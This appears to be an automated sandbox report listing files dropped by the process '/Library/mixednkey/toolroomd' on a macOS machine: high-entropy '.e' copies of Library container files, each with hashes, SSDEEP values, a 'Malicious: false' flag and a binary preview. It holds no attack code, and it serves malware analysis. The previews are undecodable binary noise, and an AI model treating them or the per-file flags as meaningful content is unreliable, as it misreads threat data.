Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}.........OY_n>..O..YW:v.]...D^0^.2..G.R6.....t._.<.......h...~.'Q8.......]9..$1qUz...._..J( ./..'.b..!.:.I"p.,.J( ./..J( ./......;>p....=...._Kj.:v.]...D\|.B...w...#..c.Z...o..H2....@v0pV..!..T..?.F]..E....b.<..r...g...jpB.LE2......._..\|.B...w.\|.B...w..Cp+...J( ./..w.@.R#.[J( ./..;]c..>bV>X..>r....5T....w@.}pn.Q....M.....4....m#.......$<..:..mUoy..J\..I..%.`Q.{]M..Q}}\|A.o..J..?_.......4q.../.I.,/a....J#k7.N.+2T9qn.2...;VX..O.....p?....^u.}S1...<@.x....Hu......w....~..:0..&`.d.k%..C........E(.>.%X...\l.CC.k$...Q..:.Mw.%p.S)!..v............<YI... .K..lk;...\|....0/\.p...y.]O...x.?E.5V.Yh..........lk;......0....)v....J...c~.R~UJ.V.y$.q..UA...7]s......K..3M~p..Do.....x...Q.....\|y.WA5..p._. %;'.j....s.w........T.ZNI_ z......\.j.:.yP...i.+.....!\|...Hu..l.i..E.{.e..$..U.C.N.Qa...G. '.r.&q0..[_B.I.o=V\|u...w...b..W{.c....J\.....s..*. 1".}>>c\.p0.S.=_......

/Users/berri/Library/Containers/com.apple.MailCacheDelete/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	29923
Entropy (8bit):	7.963016757052098
Encrypted:	false
SSDEEP:	384:vAvWmgif7WaCtk+jxHoz34NXrFiBahjqZiWIWDWrQFsgEE++o4nTpLhBUKTK5siq:I+HnX1bBjWwrAsJ+o4f7X2xgT
MD5:	88DAC5C62B3E21FD19E40CFCF2DA1B01
SHA1:	ABC8A76A995FF0EA1D8DA309EF43BC8B6F9D840D
SHA-256:	7D5A2A92C428ED73CB5893C727D8258629696BCECDA10D250262B7BBD2EE4BE0
SHA-512:	A45439A8C1892E789E1472A3575F70B816E83FEAC564DB29F4144AB978D9142D3479F7AE62848EC8FE919FFCBC66B298A5E13FAB56CA685764AEE21615D72C8A
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..)j...F\|.s......<5\|.7...x......w.#h..."Mot.#....[6.P.P...........O....;....r?E......Ypn../.@l(Is..P......'Hd../.@l(../.@l(/.T0.....t...+.(..=%:.....x.....B.$.r....Z....c.7....H\|..Q;.yeB...f(.V..9....~@.%k../DvT.!....q....C....:..m...7%...B.$.r...B.$.r.S.J.:..../.@l(..u..0..../.@l(._....aVW...V8uZ.0.$P.#[".G~........J....\..Yn.F5YWB:..F......`3.9(..\..I..%<._._C.f).!.....\|~.....bR...\|.."...&.b.RO.!G...l,..5.!\..W..cb2. ..H...A.7.!z!..&X...J.......U..N.......5R.....4#?....HM.s.<.E(.>.%X../...J..o7.KX..........\'..m:......w.e......[ZuCz..dF.........C..........4.. A.K....b..O'X..[ZuCz....".l4.....N}-...o.9...f.....0.LU..._M.4..m..l.;..C.....n..p..55....6C1.].%.w2.l.n....Np...T...9v&.J..J........>........+0./...9.....L.2.0K.$.<.J&.j..Cq.vN.8.j@i...+....O.].lM......US........\|.iY.uHw.@...\.f....o...c....WkOz.)\|..,..r......./t:.f..ec......n.hY.\|

/Users/berri/Library/Containers/com.apple.Maps/Data/Library/Preferences/.com.apple.Maps.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	642
Entropy (8bit):	6.52889755849062
Encrypted:	false
SSDEEP:	12:UIrF6wd+tkxU19WuBRH3HtZdQxqel0d/wFWzfq9+WsewLYTc+qGm7:UIr4bkx286RHbOUvd/waqEWsePc0m7
MD5:	98568D4F022C77DD8783BBF04C239EB9
SHA1:	7360A862519FB41CE96FECEBAD86EB5BAAECDD02
SHA-256:	38EAB94FDC779083C59B60AF7CF35DC78F374134DCEF7828346D79A2EA47067F
SHA-512:	B05CB387F6A8486446580295DFEA7D44C23CFB16B5415457890A7869E3B1D02D73EFEF163CD6D30EFC677B0F24B1168756F7236062C451CB270D820DBDAD76B7
Malicious:	false
Preview:	...a>k..J3.8m.2y.<+...w.Bm.e.I..I4.FS. ...mmw.(..[.gc.Y.<........b..Y7..w]....v....G.......t~QqT....7..o`.=....o....#(.A<w.6.m..f2..=.....[c....&~Yq)\}#.[^..a.............(.f..."..y...7.{i...F..&.i.p{..c...C.sI.i...3.O..G.....U.F.....5.._...o...c'`}..8.0.5..h...!......2..^U./..H0.6.O....rW..o0....:.,.j.....,...4..Q.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.MediaLibraryService/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	27355
Entropy (8bit):	7.955355406120847
Encrypted:	false
SSDEEP:	768:T+Nat/mAEECgr4yBrbAK6+bWnjiieYsH8Yg:T+NatPtUsAKYiieDvg
MD5:	0D09DD5F302EBABDC7315B74EFDEF679
SHA1:	0FDF6C7F026FD59FC2ECF6BCF4141576E3F2F480
SHA-256:	3AC7C7F9AC8B6E57C828677C0399DFD4CDCEA351D97C6CDD18EE9AD75F1AAB76
SHA-512:	B618A878E30593F65808FC025769D7BB901A70B441D9951B92955703A24A67CC08B7DC061739AA428A72B5E78552BEBDB1CD1ED3730265E7B3F895DE89DFE55E
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}....^...Y..hu.%.`......"=K..`..1...6.Z.V....&.z..;............x....K..[.C..C...j...-.q...=.\|~.Fg....gQ(...-.q...=.-.q...=.]........OX..?.IYf)...."=K.....c-X.aS ... ....,V.....[.QX_.<.>.....!..6.Z4....l/J.l.\.H"...4`..I^.....u.....Q....c-X....c-Xt.......-.q...=.d....j..-.q...=2......ji.....E/k.n.-Y..+c..N.......]P..l.xS...+p]..../.I...P..EX9....[..d.-xPc..sp")...ml...../....a..Q{...g.RS.s..-...t..b..c9....-.....np.mf%.....!qW......qY.....%...N.3....7'.E(.>.%X@T..[_r...M..z..j.m.....LRT..!>. .6..H....q..........4......Q....I.&......J.v.....H....q...c+V...W....F.)...=N....Z`.r...8...I.y.C..S.7@.,....X ..+%./Nu......7.lW.(J......./..5...Q)W..$..T...9v&..f....fSU.m.:.jcZ.*.w.B.6h..}I..c<0......c..wH...d..1.-I.z.....6^...h..d..I.&..7..).T.(...La.A.=.........-...CM...Bu.o..w._...xe......R......A..d.X].Y........Y:D6B...[...8...Qy.< Gbd...a.Gr;v..

/Users/berri/Library/Containers/com.apple.Safari.CacheDeleteExtension/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33220
Entropy (8bit):	7.967545627824992
Encrypted:	false
SSDEEP:	384:UVKgdsRTtByfemYZQ2cJ7CCKa/hsjgXrNAnI9WvDcIcXaTP0VY8A4zLFt/0wmcxB:UVRd0TzymZGqorNAnIwwF8cu4zp1PmaB
MD5:	4CE7551E410F79FE78B9ECF94D1B5BDA
SHA1:	143761D6BF0087D45592E6F6CD0160672BDA84B8
SHA-256:	7E07C6710051BED27299BD52E9C1C211171C60A90F49A00A9EF1056D53907860
SHA-512:	26D577D2B43A324B1C1E4D881F05C022ED483CB74B436C22DE424D1B211F388615F1D1C24D3BD815E06116885F1F074FE8DE943374E35B6421F860E7C54AA07D
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}do.<E....zo......O..j.xW....8}......a.L..]...b....V..x..y"v....W-VJ.........o.?.P.R..x..?...@ ..F..`...3...>......_.....F..`....F..`..../...e..yR.QWU;......f....8}.....:b....nX....w..H`...:....G.t.....#C+.....X...z'^..!.....Z......n.7..u.e.o........:b.....:b..~.a.Z....F..`...4..2S...@2D...y."n..d\|....z..r...$z..z..@....&..I6..{.l?.....V.......iM.N...9D.O.6$O:d..%..C.;....r[z..c4?....v....BYg,...9........U..(....u.n...@..^.].RF.?i.....H..d..C..X8^T.04k...-.....p.q...@.4"....-m..B9...+....H...X.$.)r1.&.a.6PX..g.O.....A..rq}[.E(.>.%X.......O....~.j.17...J.......#-Q6.ADa.._0.6...gyZ......4./....p..\|.......(.....+6.D."....gyZ....p8.24.J....V+.U...i5.\>.Z.,........5.l.b..D.A...H....:" $..n....... .....-%~=.y..-..a.Ho#.T...9v&...J..".o.LZ..e._..I=.{-...U".=....,5...'FB....N.Qa...G.R.....JS/.N...>%...4L.\|../.>.?...%j.:.w\|.....XP@.$...u,.(..8.s...#...$.8..\|.

/Users/berri/Library/Containers/com.apple.accessibility.mediaaccessibilityd/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	26755
Entropy (8bit):	7.951630550485867
Encrypted:	false
SSDEEP:	384:r8MqFNCPFLkieFjfXkVQ7z34NXrFiBahjy0e6h/FATzYb6jCLBWKxlXclW:sFNgNkzFXiBGUhdAnQ+yk+sI
MD5:	48BDB40BA4E20876F8D9C3B5CB233BED
SHA1:	D2ADDD1623C4D698FDE2B25FD4EC3EE2A3B22C6C
SHA-256:	322730F91F8BB52B8CF216627880A531F624DF5963B628280640CCA66232BB7A
SHA-512:	80E2F4C631EB2A21FC563F1B978EED3F2F21901C86FD2DA3E76D2DB5F0D0E1951C1D3A7ED41E6626044263901EEBD4232C0CBBEF7B2EEC4F5012A37E411DBF89
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}s=..Ez~7..../u~u...^.....m\|.p/.q.i........]G:..=..v..V]..q1 ....&S... +.8p.3`..."..ie=....V.....m\|.p.fY..i...x8.H"....m\|.p....m\|.p.b...=.^.[_..1..Sn....O.AH...)7...'..F}....d<ta...v..g=M.........."c....+Pl!<.g..f...:..X./}0\|.m.$"o.g...(...y.2H)7...'..)7...'...=.J0..i....m\|.p.l....$....m\|.pu;..l)..#n.......T.....z.........Fe].%..vX.v.q.+l=....d_........A\..I..%.......k\|.......@.Wq..kxy.&P......(.Je...N.G...:...@..z.U%.n.K..........jp...be.C..T?-.D]..Phb..2.xx.. #p.......&.m...H[..E(.>.%X.\|".W.y.X..P.@oY...+.;n}..{5.Cg.....4........f.d@..P9....<./.......;o.!........n.'.z......f.D@c./.....5..Z...........E..9..q.....(...#l..\..C.{.H.....}...(Q.r.7...Vr...............7dJT...9v&.$..b.UU.W....I..U........G...n.....8do...-....`O....-A.7.@....\Ob. ..?m....j....L..x.Y...-.1'...z...?.....T.q{.........z3A.\f.5.....q.]...B.<Ok&H.....,Y...+T.......t....`.>.P,....R...(.{

/Users/berri/Library/Containers/com.apple.cloudphotosd/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	34756
Entropy (8bit):	7.967096721708327
Encrypted:	false
SSDEEP:	384:zDJZBQePHlT8J1RhSYJghPmpUcjtMZdaKImPqK6JN1jxA1aFAESwa6QvEpPbxoum:3JFloKPX5F1eAESPEBl/Ezt7yE+5Y
MD5:	548EA41FC712442031AC9AD9CBC83EE2
SHA1:	44965F927D8EC00B2D65C2EDC21D6E514B370B80
SHA-256:	671DE625DD0A08DF51D75CB8B89F346849B6ACE66E102C067982B66418679F86
SHA-512:	661F779230612127F8CB5EAF040CF719C1D27E32FAE0C4766BA23F2772E33CB1D0D0A3ADCB06EAB81DFF0E6C10F62CF5971B7C0945A281776216400216FF6E66
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}l^.\M.ZX.#^...k.e..1.D.\................1x.z...C.ZU..`&Em...].....h..g.F...e;%...M...'J;,..Bk-..^\|I.9..]..,....,..Bk-.,..Bk-.>YM7.,._!..V^......C.a.6.\...h..].w@.......?..p^.hs.+..j.K..lxR.ne..*..PL..b,G..@;.\.,...).S.o.%a.8.%qy.$.NK.G\|h..].w@.h..].w@..;.b...&,..Bk-....e.3..gr%zk7.....=.w..I.p...yyl.4...MQ-Re...?....Z...&G.\..Y.\ut..q.\yH.. ....5.....\|?WST..[O]...>r..(.Jc4?....v8....;............$.W.`'u.......=.z..v.P.a...X8.?..Z....1.,...GAP..d..sW>B.y7......<.\..(......]......>..k...i.%U....(.EX...Y>\|.H.....[i....%....f:2..`y[.....u...E(.>.%X....A.^.M..Ox6....r.3....m.._......5......A...L..Y..5&...::.m..=.;gq...:....\|..X..fe,.C..U.....k.q.bY::.m..=?.W.A..n.....C#1ER,..5..R..">_7.........Qy.n^......Z...#..=g.k...,.."$.......W.Y..W:...dZR.7...-4`T...9v&..SI.>.....XC...X....~.=.P.V;................E....{.qm.N.n.[..Ir.af..Xw/.aD....Jn#Z.8.....{.

/Users/berri/Library/Containers/com.apple.cloudphotosd/Data/Library/Application Support/com.apple.cloudphotosd/services/com.apple.photo.icloud.myphotostream/.serviceDirectoryInfo.bin.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.351134424753744
Encrypted:	false
SSDEEP:	6:UqCBWEQVy7Jn/37BV1PIB5s36fVP6hlsVVn89zHmUxdaBzsewLYHEec/LaqG8rQ0:Ud0o9AvssAh2VVn8NHmFsewLYTc+qGm7
MD5:	6CD38761FDC69E50F6B8AFAF53F12220
SHA1:	AD7FCDA5474F230E6ABA9D3D7FC3CBAF7F10312C
SHA-256:	52410D6AE249C292E011610753792038759BAEDA7ED2871988D918F946460E4E
SHA-512:	286DC1023890B3E1347010FC2F1431F1866C1BAD6BEADE50D9A69DE686B9D59AAEC7D4E77F86D8A04DB5CBAE91FA85260A5449FB4ACFBA0AD7D9CB664B11118D
Malicious:	false
Preview:	...a>k.......Xd....M12.zN\|...F...=.... ht..8...7\Um..>pZ.vO..{..w#F){..Y.@.....k.xl..{.;&O.3~.. .%.G.,%{.n.t$G...<..(n.J^....6.,..J.vx.~/..}$.X..?z..I/.=C.eg..w.:v.v[ .r.[...6.^.I..;jWn...Y.J^.t......>.Jo,@...X.J..Hii......pk.>..`...^Q/3.......b.n....s...=n.Y..6<.."a..d...V/..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.cloudphotosd/Data/Library/Application Support/com.apple.cloudphotosd/services/com.apple.photo.icloud.sharedstreams/.serviceDirectoryInfo.bin.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.351134424753744
Encrypted:	false
SSDEEP:	6:UqCBWEQVy7Jn/37BV1PIB5s36fVP6hlsVVn89zHmUxdaBzsewLYHEec/LaqG8rQ0:Ud0o9AvssAh2VVn8NHmFsewLYTc+qGm7
MD5:	6CD38761FDC69E50F6B8AFAF53F12220
SHA1:	AD7FCDA5474F230E6ABA9D3D7FC3CBAF7F10312C
SHA-256:	52410D6AE249C292E011610753792038759BAEDA7ED2871988D918F946460E4E
SHA-512:	286DC1023890B3E1347010FC2F1431F1866C1BAD6BEADE50D9A69DE686B9D59AAEC7D4E77F86D8A04DB5CBAE91FA85260A5449FB4ACFBA0AD7D9CB664B11118D
Malicious:	false
Preview:	...a>k.......Xd....M12.zN\|...F...=.... ht..8...7\Um..>pZ.vO..{..w#F){..Y.@.....k.xl..{.;&O.3~.. .%.G.,%{.n.t$G...<..(n.J^....6.,..J.vx.~/..}$.X..?z..I/.=C.eg..w.:v.v[ .r.[...6.^.I..;jWn...Y.J^.t......>.Jo,@...X.J..Hii......pk.>..`...^Q/3.......b.n....s...=n.Y..6<.."a..d...V/..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.cloudphotosd/Data/Library/Preferences/.com.apple.cloudphotosd.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	354
Entropy (8bit):	4.895459589373578
Encrypted:	false
SSDEEP:	6:Uq2DtKhYo808BzsewLYHEec/LaqG8rQQwiQ/6:UpZKh6nsewLYTc+qGm7
MD5:	245828CDD02FBCAB3890E51B54562847
SHA1:	A93BBA2B2EA61729AEE1D362551AA2E04EB29516
SHA-256:	9FCE6263B231C8FD4E5CF4C23E64A9EAC346C7BEA3B089E0105CB011A5050FED
SHA-512:	BBE78BC8913C46F29B5BC8E3FD94A2FA5FA7788B0414C5442C2C7BCB124704A88893703C822DF8854F9FAFB67A32D33A068CEB70DF9056325C53D69495B1CA52
Malicious:	false
Preview:	...a>k..!f.%..-....y..)...c..kU6<.."a.......-;.1.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/.MapTiles.sqlitedb.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	110960
Entropy (8bit):	7.059041709362606
Encrypted:	false
SSDEEP:	1536:H3JXa7+9ZSkbi74nhHCObF596DN6vxgwpD/:H3l5/E4dh6DN6T
MD5:	C9334CBBE080DE8AE5B8D3ADBCACBBDE
SHA1:	0E6AE1B0E369C8B12521D6CECA408EB0E69FBAF9
SHA-256:	B9C2F4DD3BAD7D219A94E0AB50579FD43688E3FC99451B150C6DC949149199CC
SHA-512:	B4C15B60B9E5E67234B7F734A0A872634A306C633013012F65A5961493979D2888C107E1A7E1A8F65BAB1107E83304877DC9B65183BDD1FB61A3D46A487EDD16
Malicious:	false
Preview:	..d.=..._t.....}......o.`...6<.."a.....jb.6<.."a....7...x6<.."a..t....Sq6<.."a..x....$.......sN.\| ZT!v.T....>&.....q.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.apple.iBooksX.CacheDelete/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	27339
Entropy (8bit):	7.959583722777793
Encrypted:	false
SSDEEP:	768:GX2vnGnzZzMX52CdNAJ42GVFpfMlm+hvK/:DnIRMX5HAJ4bf2/i/
MD5:	3C3DAA773B3EF08D2B2B38995C836707
SHA1:	22DA2763274D8CB9C84BAFF2F4C134822833CBE2
SHA-256:	4C11282D5CFA2B041F845193736355514917941AF0998371DFDA4F30A7858330
SHA-512:	B13A41F898897DC1E6F50F233A3385E48C2E656560B875C004FD0FF446B6D2C11F33DE9E990524199E4383C97EC0C32CF02B99ECA1C37FFE2921ADB4D56CD345
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}...g<..\|.s......<5\|.7...x......w.#h.....}........A...p(l$.&+9..4.^... +.8p.3.A<.'Z..qLL.8..,../.@l(..G..xGl...).i.../.@l(../.@l(....DP .[_..1ds.c?.,...x.....B.$.r....Ry.S.....{.e..+rB.oy=.2..+.....Q.D.k~@.%k../DvT.!....q....C....:..m...7%...B.$.r...B.$.r.S.J.:..../.@l(..u..0..../.@l(._....aVW...V8uZ.0.$P.#[".G~........J....\..Yn.F5YWB:..F.....[G...6.g\..I..%..2....a.ki.6Ab,}.~.T!.P..bR...\|.'.}....M....3....;.D.-Xk.G....%r.A.x.JJ7....I....d...0~ .7...=.^..\|....q......j...N....$....E(.>.%X+j+&#....K....D.mt.....GG.lx...k....>.....J.T5........<..D.J{..Z)..aV7...2{....N.>.....J...k....L..NF...V....P..-.L.0....2pN>.].~h....Vq.q..(w.....s&..z.%...S....5>FW........<O.T...9v&..M...T....HIG6....p&u[....."aN1W...8do...&D`.;V.....-A.7......#Ob. ..?m...A.pH..L..x.Ys.t)&..\|....}.$.....T.q.,...QD.../3.%..k.s.t..Bxodr....K...q^.J.....,..t..\.....S./cb.!&.l.hj......

/Users/berri/Library/Containers/com.apple.iCal.CalendarNC/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	34044
Entropy (8bit):	7.965796216502476
Encrypted:	false
SSDEEP:	768:GnQSzFm2AiwcmN8UX/Ab3PSozUKSNDLpiuD:GQSI2ARcmN8kAJz1oUuD
MD5:	306EC900542DAB9B2A0059C5E02B430A
SHA1:	0833A4E20ACC52A7CBC16B01ADA3789F0167CD59
SHA-256:	14CE8F48FE6F27B435937CC9E6B593FC290F58BD7611F0BCAE0EC2B5AF9A26FD
SHA-512:	2AD06B79B1481FB61DB8AE1A017968EE3DB1034BC0F729C6222746C86AABDF3A2ECB1B235CF5EA7D304143F683FAB4831BED086C5CB8ABE4EEE2332DF8FC17FF
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}....Oc^xp...N.xJ...b.....k.X4...>...J.0...mS\.\.]...7.k...l..Z..3.V....+6...mt..^H..m...+c..........4..h....y....G....................R.:.LyUf.s.t..t.....k.X4......._.'.c.`.....c..cA.....f..3........w.....->M.?&.l.. ^O]..d$..F........+....8_......._......._......d............EG9;........"....-..#.S..y..Ev<.$....v....e..\|<+Bb.w..8xD....k@.?....~..."../......\..I..%.1g.O...._.jX.c..r....I....e4.K.gb.g.`eG....?s...T ..$EY...z.C...^.D.oFn1..Y.W.#.1.4..\{.7..F....\..k....!]."[.....C. q...b....y...D...N...NC.hvKr.E(.>.%X...3...tpRjC..7..J.t.#x.....g/&c.u.e..R.f.@...9p{:.....2..LF..?V..e...}.qx...8..m..".hW....N.A..3...g.~Eyl..?V..e..#.rS..y..r.w...V...l,..p.q_,.i...C...L....g.B..o#..)...'Z.=.5..ZI<.(.;oS...~"..4..A...?7U.....G..dT...9v&.....ID.[.f.(6T\|.HZ#'`..D..A...t..FW...i6U.n..RK....x..B6<.,.K.'.J.p.Cm....[@1...N.&....xp....V4..5..8uv.8..q......C.u.K...mY..x

/Users/berri/Library/Containers/com.apple.mediaanalysisd/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	28891
Entropy (8bit):	7.958029674392251
Encrypted:	false
SSDEEP:	768:QOrLMxSHViAfspEgrNAn2mwVXMkZbBDY9SvOdQNNZ:QSQAEpEOA2RVdB2oZ
MD5:	4D61A8328B2F17396DDB7AF608981857
SHA1:	E9E4435BDD45A8ED3572746A1032475A0040E6ED
SHA-256:	3123D8AB7888F7187C02EB24823CC9FE0ACEE89170D847C38BD4F16CDA61994B
SHA-512:	B6C96F1E6F4C0F0EF94A024E250C973DFFD8902EBC1219A32EB74E1A9DE889B0DB8ED000F6D1E7E05BDC8F3C6CD6E510DCD5517B33B5B0AEB71931B9E1BCB41B
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..kX..:.o.8.Bu.h[.h.c. #.tab].9..1..\|.0,..g..I.Z.Q=..)..9...Re?.9.O....;.3..U+.@.....}.#Z.P\|..:..Om.E.Z...O~...Z.P\|..:Z.P\|..:...A.c...t...+...m.,... #.tabo..4.2]...G.........Y....I..:.{...bZ..?..y...&.c.... <....5G"......H.>_.......\|./o..4.2].o..4.2]....#.\myZ.P\|..:..fR...YZ.P\|..:.[....g.].6..jG..Y.V^......]....}.)....k..Nl.k.......<..........\..I..%7.F....(?...)qe.f.......V...S0..U.B...Fv.S~.......\|..aT.N....7@../i.qS=...Mw+........D\|H......V...J!...j.).<.}f.om.=.F..V....,.E(.>.%XW.P0.....5%..gX4..........K....Gh.....h=F>....)..o..nfw.e..R....q"..5...\....p...42.dI...m...)..o..Z....._....d<....#..b,.H%...M_....);BnhI.(}.o.........h..........Q..a..n. .....:.3...X...T...9v&.'.4..wY..X...[2g{:.{.A....a...F.....*L[.C..z...<.J&.j.&...q.fs8.j@i..2r\|.U...O.].lM..#......1.@..{^..iY.uHw.I.3.2.....&q.9G..h.mc.m..H`..pO.o6w.~&..!ij...X.E..2.<.d...9P.

/Users/berri/Library/Containers/com.apple.quicklook.ui.helper/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32715
Entropy (8bit):	7.963665763175098
Encrypted:	false
SSDEEP:	768:yga4LknDeOu4Cd2957R5l406rjIoG+zGanBiihoDve:ynmknDsP29dRvtCIB+zGiBiihoDve
MD5:	C8847C94733387181BBE376C03FA6C86
SHA1:	D0E1484D9CF6D1F85187A06B592A22BB32BB40D8
SHA-256:	7C7644BE57A10661C236D729E3792DCAEA08AAFF2B8F4BFA10DE157277DA6358
SHA-512:	9797B8AE366EFA94B2A75E9E4D27F6C71302DB627FED7159D7E00156CB0CD784DDE5F87D3D3FE346CD5B72657280E017A583905ABB1310EE6245539856B9F7E1
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}L.....U~.....?....70.V.M...........+..k`)..>.......{.T:.x.q.\|...q..W.F.o....F.....r.$..R.`..L.....v..w.]e.R....`..L....`..L.....8^...co....<V.l......V.M......=.%?..h......v7.s..."wdL..&.6.5.'........0.......Cx.......Qw.Eid........j-~.q{..q...=.%?....=.%?...S9.>o~.`..L.....m..?.S.(w.z..W.sR..Z....L..XB....![...p.l..8a.o.g.kO...`..:E...>P....#.g.DI..G>+.@.;N.{..`.U..-...0L..s(6..<c4?....vc..e..A..]..<M.....[2YNQ2.h.E+G`.......<...C....t.2..Hl.....zJ...Y..6%.I.s.........S."..Y..?3.:.......YtN>.@.........%.$-.6.S".a.81r.A0{,.r.Te:gy.....E(.>.%XgW....\|.C....B.Z.YG.Q...>.I]...........}.x#..."2.(.....Q\.6K~9\|.....zx...w...$.q....@3....EBQ.B....Q\.l.r..Dc.>.jmf...X._}....P.../.f..Q..c..?j...*EzCy..y.N..7..l..]....b....0yF..a..\|.1.A........q.....T...9v&..9..X....6..........u...n..n.......n..O...t.......U......T..s<...q.._....V./V..3t...........3..Gu.J.l.,..

/Users/berri/Library/Containers/com.apple.siri.media-indexer/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	28035
Entropy (8bit):	7.959041014058907
Encrypted:	false
SSDEEP:	384:W3Sy6Ni8gPgBaxbYqVFpXhdScLMan4jt+xA2ojmHj1FAeK55BLvCOCrpLXVaicmY:iSpiN6qVvKKAjCfAz/LqO+Zlaicfj2o
MD5:	A069B62BF355686C3C6C1DAB44121DF6
SHA1:	28E11E679C0D6993A8A51240C8D0706314310B3D
SHA-256:	3675501D3A25A966F3C641B226275EBDD1F152F2AE6591C5B01416A9EA614054
SHA-512:	E295F58BA7C07D3A3A1DC51032DF02BF9432A73151C4365F8BFD64B3126CF090113D85B679170FB84FEAF110A85D41CD1F89D00F68DAC3BF1D41918638B95974
Malicious:	false
